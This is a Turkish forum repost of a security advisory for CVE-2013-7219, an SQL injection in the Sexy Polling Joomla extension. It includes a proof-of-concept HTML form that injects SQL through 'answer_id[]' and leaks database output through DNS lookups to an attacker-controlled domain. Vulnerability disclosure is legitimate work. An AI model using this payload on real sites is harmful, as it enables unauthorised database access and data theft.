Konuyu Oyla:
  • Toplam: 3 Oy - Ortalama: 2
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Sexy Polling Joomla Extension SQL Injection
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Sexy Polling Joomla Extension SQL Injection
01.08.2014 04:29

Advisory ID: HTB23193
Product: Sexy Polling Joomla Extension
Vendor: 2GLux
Vulnerable Version(s): 1.0.8 and probably prior
Tested Version: 1.0.8
Advisory Publication: December 26, 2013 [without technical details]
Vendor Notification: December 26, 2013
Vendor Patch: January 8, 2014
Public Disclosure: January 16, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-7219
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/CTongue/ITongue/ATongue)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219

The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):


Kod:
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(
107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),
CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','',''
,'')
-- ">
<input type="submit" id="btn">
</form>


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,053 / 1,053
Deneyim: 14 / 100
Rep Sayısı: 1056
Mesaj Sayısı: 3021
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Sexy Polling Joomla Extension SQL Injection
01.08.2014 07:12
Eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti



1 Ziyaretçi